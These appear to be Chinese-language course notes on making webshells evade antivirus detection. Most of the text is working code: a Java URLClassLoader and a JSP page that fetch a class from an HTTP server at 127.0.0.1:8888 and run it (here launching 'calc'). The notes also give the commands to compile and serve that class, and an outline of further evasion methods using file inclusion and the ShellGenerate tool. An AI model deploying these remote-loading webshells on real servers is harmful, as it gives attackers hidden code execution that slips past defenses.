免杀应用-类加载器

import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLClassLoader;
 
public class URLTest {
    public static void main(String[] args) throws MalformedURLException, ClassNotFoundException, InstantiationException, IllegalAccessException {
        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL("http://127.0.0.1:8888/")});
        Class<?> aClass = urlClassLoader.loadClass("Run");
        aClass.newInstance();
    }
}

import java.io.IOException;
 
public class Run {
    public Run() throws IOException {
        Runtime.getRuntime().exec("calc");
    }
}

javac Run.java
python -m http.server 8888

<%@ page import="java.net.URL, java.net.URLClassLoader" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%
    try {
        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL("http://127.0.0.1:8888/")});
        Class<?> aClass = urlClassLoader.loadClass("Run");
        aClass.newInstance();
        out.println("Class loaded and instantiated successfully.");
    } catch (Exception e) {
        out.println("Error: " + e.toString());
        e.printStackTrace();
    }
%>

免杀应用-Webshell

文件包含下本地包含
远程读取配合本地包含
远程类加载器配合
免杀工具思路特征改动ShellGenerate

LoCreics Space

Explorer

Day117_Webshell免杀

免杀应用-类加载器

免杀应用-Webshell

Graph View

Table of Contents